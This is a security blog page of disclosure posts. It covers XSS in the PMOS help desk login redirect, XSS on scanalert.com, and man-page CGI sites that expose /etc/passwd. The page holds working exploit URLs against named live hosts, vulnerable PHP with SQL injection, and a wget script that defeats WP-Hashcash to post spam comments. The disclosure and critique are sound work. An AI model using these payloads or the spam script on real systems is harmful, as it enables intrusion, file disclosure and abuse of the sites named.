Seth Woolley's Blog

Occasional Musings

anatomy of a typical XSS problem with user logins and cookies(0)

Synopsis

Repeatedly, I see the same stupid login/authentication cross-site scripting mistake, over and over again, so I thought I'd tell everybody about it to try and remind people what not to do.

Background


PMOS a POS

Check out the pmos help desk, here:

http://www.h2desk.com/pmos/demo/login.php

Looks normal.  Only a couple fields to enter data into, right?  Not quite, there's a variable that we don't see right away.

Click on a link in the header that looks like it might require authentication, say, tbe "Browse" link, like this:

http://www.h2desk.com/pmos/demo/browse.php

The php is so smart it knows you haven't logged in yet.  So what does it do?  It gets smart -- it says, hey, I need you to login.  So I'm going to send you to the login page.  BUT, as an added convenience, I'm going to tell the login page to send you back at the end like this:

http://www.h2desk.com/pmos/demo/login.php?redirect=browse.php

Isn't that nifty.  Yes and no.  Yes, it's nifty in that it's a cool design improvement, but no it's not in that it's another form of input into the system, one that isn't so carefully guarded because it'll never hit the SQL system.

An unsanitary problem

Let's download their source code and take a look at how they implemented it.  I just went to: http://www.h2desk.com/pmos/ and clicked http://www.h2desk.com/pmos/pmos214.zip and opened up login.php.  (Ignore their statement, "Also, please read the GPL license thoroughly. By no means can you use this code (or any of it) in your own product and sell it as your own -- that is completely illegal and will be prosecuted."  -- This is false.  The GPL lets you charge whatever you want for a product so long as you give them credit in the source files/changelog.)

<form action="<?php echo $HD_CURPAGE ?>" method="post">
  <input type="hidden" name="cmd" value="login" />
  <input type="hidden" name="redirect" value="<?php echo ($_GET[redirect] != "" ) ? $_GET[redirect] : $_POST[redirect]; ?>">
  <tr><td><label for="email">Email: </td><td><input type="text" name="email" size="30" value="<?= $_POST[email] ?>" /></label></td></tr>
 <tr><td><label for="password">Password: </td><td><input type="password" name="password" size="30" /></label></td></tr>
 <tr><td><br /><input type="submit" value="Login" /></td></tr>
</form>

Ouch!  No sanitation, whatsoever.  They let you do pretty much whatever you want before you login (this is not so dangerous).  But first, let's note the first problem in this code:

http://www.h2desk.com/pmos/demo/login.php?redirect=%22%3E%3Cscript%3Ealert(location.href)%3C/script%3E%3Ca

(Note that the email input field is also XSSable (but via the POST method).

It just puts that directly into the hidden field for the redirect, without sanitation -- classic XSS, but not so big a deal -- if you're on the login page your cookies probably aren't there to steal yet, if you have well-implemented session-only cookies -- which they don't (they just let them live for a whole month):

setcookie( "iv_helpdesk_login", $_POST[email], time( ) + 2592000 );.

Exploit


Delivering the payload

If you need to inject code where quotes aren't allowed (magic quotes are enabled, for example!), you can, for example, use the document.referer property and setup your own site to download two different sets of data, one intended for the client, another for the server, so that when the server sees it they get needed payload.

Here's a way that just decodes part of the url for the payload to avoid magic quotes altogether:

http://www.h2desk.com/pmos/demo/login.php?redirect=%22%3E%3Cscript%3Ealert(decodeURI(location.href.substr(132)))%3C/script%3E%3Ca&s=This%20is%20the%20payload

(Tricks like this are why javascript should die.)

It gets worse from here

if( trim( $_POST[redirect] ) != "" )
  $redirect = $_POST[redirect];
else
  $redirect = $HD_URL_BROWSE;

$EXTRA_HEADER = "<meta http-equiv=\"refresh\" content=\"1; URL={$redirect}\" />";
$msg = "<div class=\"successbox\">Login successful.  Redirecting you now.  Click <a href=\"{$redirect}\">here</a> if you aren't automatically forwarded...</div>";

$do_redirect = 1;

Yep, they let you inject code _after_ login has succeeded, so if you want to make sure you get their auth data, just... let them login first before activating your payload (which you could carry over via document.referrer instead of document.location if it's not an encrypted link)!

Note that, magic quotes _must_ be enabled for pmon to work.

Magic quotes and SQL

Futhermore, it's littered with magic-quotes-expecting SQL commands like:

$res = mysql_query( "SELECT * FROM {$pre}user WHERE ( email = '$_POST[email]' && password = '$_POST[password]' )" );

OUCH!

Conclusion

Yeah, stay away from the h2desk pmon code (no idea about their commercial offering though), as it's not a good example of quality, secure code.

Seth Woolley's Blog webdevel security

scanalert(0)

Recruitment

A couple weeks ago i received an email from the http://scanalert.com recruiter who saw my resume and invited me to interview at ScanAlert.  I emailed back and called the recruiter the next day to see what the position entailed.  It was for their "ethical hacker / penetration tester" position, which is still posted on their website.  I was curious so I thought I'd see what it's like there, having never worked in a "corporate" security environment, but instead for smaller businesses.  I talked to the Vice President of Engineering, Ben Tyler, and he offered a challenge on a fake website:

In our fictitious web site, one or more of the following
vulnerabilities may exist:

Cross Site Scripting
SQL Injection
Directory Listing
Path Disclosure

They wanted me to send an IP back to open up the url to me for 24 hours, but before I did that I was bothered by their apparent "find all the vulnerabilities and slap a sticker declaring it safe" mentality, so I took a look at their own website and in a few minutes happened upon an interesting XSS vulnerability that let me inject html attributes into a link.

https://www.scanalert.com/Link?url=http://scanalert.com%22+onclick=%22alert('hi');

Response

I replied back with the following:

Hi Ben,

In reaction to your challenge to break into a fictitious website, I
must challenge you to secure your own website:

<XSS exploit url here>

When your recruiter contacted me for a position as a Professional /
Ethical Hacker / Penetration Tester, I was curious about the idea of
being employed by scanalert, however, I have had some doubts when you
said "find the vulnerabilities".  The use of a definite article led me
to believe that there might be a culture of "finding all the
vulnerabilties" in websites, declaring them secure, and then slapping
stickers on them.  There is no question as to the value of security
auditing, but it is just that, an audit, not a guarantee.  Questioning
the efficacy of such a culture, I decided to test its value by checking
your website for basic vulnerabilities.  In a matter of minutes I
discovered the above vulnerability.  The "Hacker Safe" concept should be
thought of as "Hacker Safer".

Now, I do acknowledge that perhaps I read too much into your wording
and that indeed, a culture of progressive security may yet exist at
scanalert, so I'm still interested in pursuing this position, but I need
some reassurance that a culture of asymptotic security thrives at
scanalert, that the Hacker Safe logo really means, internally,
Hacker Safer, and that I too will be able to gain progressive experience
in novel and interesting security techniques while employed at
scanalert.

Seth

Confirmation

No reply came back, but five days later, I noticed they fixed it, but poorly.  The following link still worked:

https://www.scanalert.com/Link?url=javascript:alert('hi');

For a security website, I was disappointed that they couldn't fix the entire vulnerability, so I looked around for a few more vulns and sent them a more detailed report listing more things things they probably wouldn't want their code to be doing, including an information leakage vulnerability and how their login form works well with XSS vulns to promote privileges automatically.

They still haven't completely fixed the vulnerability, despite it being five days later, again, so I'm publishing this blog entry to expose their inability to manage their own security.

Seth Woolley's Blog webdevel reallife security

man-pages.net exploitable too(0)

Update

When will they ever learn?

Exploit

http://www.ctssn.com/man/index.cgi?section=all&topic=%2Fetc%2Fpasswd
http://www.ctssn.com/man/index.cgi?topic=./index.cgi
http://www.ctssn.com/man/index.cgi?topic=man

as always if they read their own manual page...

Update: I looked again into this site to try to craft a vulnerability report:

http://www.ctssn.com/man/index.cgi?section=all&topic=/home/aaron/www/ctssn.com/html/man/index.cgi

Analysis

And their isquestionable string is not the same as the one included on the cpan website, yet the modified date is back in '97.  They are using the latest version of man2html though, 3.0.1.

Perhaps man.cgi has been updated and many bad man.cgi copies are still floating around, or the source code was fixed without changing the modified date in the tarball.

This is an odd development.  It seems every site I run into running this code is flawed -- why would there be so many flawed sites created after the last modified date?

Seth Woolley's Blog webdevel security

XSS not a security problem?(0)

Critique

Slashdot carried a link to an armchair security "institution" (Why make up a corny name for yourself, call it your company blog and expect kudos? Just blog under your own name!) that makes this claim:

http://neosmart.net/blog/archives/194

"It is *of the utmost importance* to note that a page that has an XSS vulnerablity is no /more dangerous/ than visiting a random result generated by a Google search - something that users do all the time."

This is quite false.  He correctly identifies the first problem: social engineering an XSS url may provide (although why he doesn't consider this "more dangerous" is beyond me), however he misses the second problem, that since the XSS is on the actual host, the javascript can run in a state of elevated privileges for cookie access to that site.  This lets you steal any of their cookies simply.

His article is thus flagrantly ignorant, and it should simply be ignored.  Everybody in the know already agrees that JavaScript is a gaping security hole and people shouldn't be running with it all the time.  While he does credit to those trying to get JavaScript eliminated from the web, he discredits them by misleading the XSS's risk as a twisted argument to elevate the problems with JavaScript.

One might argue that it only strengthens his point that JavaScript sucks because it is the very thing that enables the problem with cookies and XSS.  However, he should have simply argued _that_ and improved his case.  Now his title is simply too false to have a lasting impact, despite the good merits of his goal.

Seth Woolley's Blog webdevel security

mozilla finally fixes security issue(0)

Exploit

I reported this security issue three years ago:

https://bugzilla.mozilla.org/show_bug.cgi?id=226495

Resolution

Looks like they decided it was time to fix it after getting a duplicate report from somebody at Stanford.

Thanks Mozilla!

Seth Woolley's Blog webdevel security

another man viewer dumb(0)

Synopsis

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man

Read the paragraph that reads:

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.

Description

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html

Looks like there was an attempt to sanitize cgi_section but not cgi_command -- also looks like it was hacked a bit and the sanitation may have been there, but removed later.

Seth Woolley's Blog webdevel security

dns blacklists, spam control, and net neutrality(0)

Critique

On four occassions in the past month I've sent email and had it bounce back due to DNS blacklists (most specifically SORBS) since I send email from a cable modem range.  These four instances were:

  • A university in Greece, while sending email to a professor.
  • A university in the Czech Republic, another to a professor.
  • A smaller email service provider to another Source Mage developer.
  • A custom email service provider in Portland.  I re-sent the email from another account, but received no reply as well.

What particularly disturbs me is that these methods have not merely decided to block based on a series of factors, but on an entire class of users.  The whole debate about a neutral net has broken down with the email system.  Users who can administer their own boxes have no way out of the blacklist, even by request, from SORBS.  SORBS, thus, exists only to serve corporate interests who want to Balkanize the web into classes of "pay extra" and "users who shall have no democratizing force".

If a user wants to use a blacklist, that's fine.  But most of these people having their email blacklisted have no idea what is going on.

More thoughts on blacklists can be found here:

http://www.faqs.org/ftp/internet-drafts/draft-church-dnsbl-harmful-01\
.txt

Example

In one case, I was attempting to notify the person of a security vulnerability in some of their code.  Since the IT department of the university is responsible for this blacklisting and they are also directly responsible for the security of said network and I have no way to communicate with them, I will simply publish the results for all to see here:

http://swoolley.org/man.cgi/man

Read the first paragraph -- how it points out that arguments containing a / are interpreted as files.  My manual page viewer does not have this problem because I knew man had this behavior.

http://www.softlab.ntua.gr/cgi-bin/man-cgi?man

Oddly, no mention is made in the above manual.

Exploit

http://www.softlab.ntua.gr/cgi-bin/man-cgi?/etc/passwd

So we can do something like the above url -- since he had no idea it did that, despite this package being a rewrite.

I sent the author an email notifying of this, but, SORBS blacklisted my email.  Thanks to SORBS, you all have first-disclosure.

Seth Woolley's Blog politics security

sourcemage conversion of md5 to sha512 95% complete(0)

Update

I've spent the last few days mangling the entire grimoire over to the new unpack_file API for validating sources using high bit hashes:

http://wiki.sourcemage.org/Source_Integrity_Checking_Standards

A few sed and perl scripts and waiting for the SCM to resolve changes between integrates and now it's mostly done.  I have a few leftover spells that I don't have source files for that I wasn't able to regenerate the proper SHA512 for it.

In other news, now I'm third place in the grimoire bullet rankings: http://smgl.positivism.org:8080/files/smgl-credits

Seth Woolley's Blog sourcemage security

hashsum patched for 64-bit(0)

Update

In addition to some other 64-bit porting I've done, I've just finished porting hashsum over to 64-bit so it can be compiled on x86_64 architecture (AMD Opteron and Athlon 64 chips as well as Intel Xeon EM64T chips).

http://perforce.smee.org:8080/@@//sgl/grimoires/devel/crypto/hashsum/\
hashsum-64-bit.patch

Seth Woolley's Blog security

wordpress hashcash broken(0)

Exploit

As a proof of concept, I wrote a shell script to break hashcash.  It works on the author's own blog:

AUTHOR='test'
EMAIL='test'
URL='test'
COMMENT='test'
SITE='http://elliottback.com/wp'
POST='/archives/2005/05/11/wordpress-hashcash-20/'
CPID="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep 'comment_post_ID' | cut -d'"' -f 14)"
MD5="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep '<form onsubmit' | cut -d"'" -f2 |
          tr -d '\n' | md5sum | cut -d' ' -f1)"
for i in 34; do  # here just change 34 to a list of guesses of what
                 # the length of ABSPATH is, 34 in this example
  wget --post-data="author=$AUTHOR&email=$EMAIL&url=$URL&comment=$COMMENT&submit=Submit+Comment&comment_post_ID=$CPID&$MD5=$(($CPID * $i))" $SITE/wp-comments-post.php
done

He uses javascript "obfuscation" to make it hard for people to find his installs.  Just look for this string, which isn't obfuscated on any install:

(str){var bin=Array();var mask=(1<<8)-1;for(var i=0;i<str.length*8;i+=8)bin[i>>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}

or just do this: ;)

http://www.google.com/search?q=%22Powered+by+WP-Hashcash%22

Elliot Back thinks people can't code around his obfuscation.  It's rather trivial to defeat -- and this script can spam his site one after another with a little addition or two -- determining the length of ABSPATH for a single site doesn't take that long either, and once you have it, it's the same for all posts.  He appears to does some fancy stuff, too "per-user", but a spammer isn't going to be "a user" or bother to become one.

Of course, you can just "interpret" his javascript, too, like some spammers already can do, but that can be more effort than it's worth.

Seth Woolley's Blog webdevel security

TrackBack and PingBack revisited(0)

Update

A short while after TrackBack and PingBack were introduced, I wrote a blog entitled "The Problems with TrackBack and PingBack" where I laid out that both were a completely useless addition to the web and only worked to increase security risks by adding a plethora of complex code additions.

It turns out that I was correct.

http://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulner\
able_to_xmlrpc_exploits.html

http://isc.sans.org/diary.php?date=2005-07-03

Rather than repeating what I wrote that has since been lost to a harddrive crash, I found a good summary of what to do instead here:

http://www.peej.co.uk/thinking/2004/10/trackback-pingpack

I wish I had a copy of what I wrote, as it predates that entry by six months, but that will have to suffice.

So in summary, please, disable trackback and pingback and use the existing methods we already have.

For clarification, the existing methods are:

  • for comment-aggregation, use a blog that allows comments to be edited by the user.  A "feature" of trackback is the "remote comment".  Post a link to the comment in your blog, or post a link to the remote blog of the link back to your comment.  This prevents unneeded duplication as well.
  • for link-aggregation, use a referrer analyzer that validates the legitimacy of referrers.

Seth Woolley's Blog webdevel security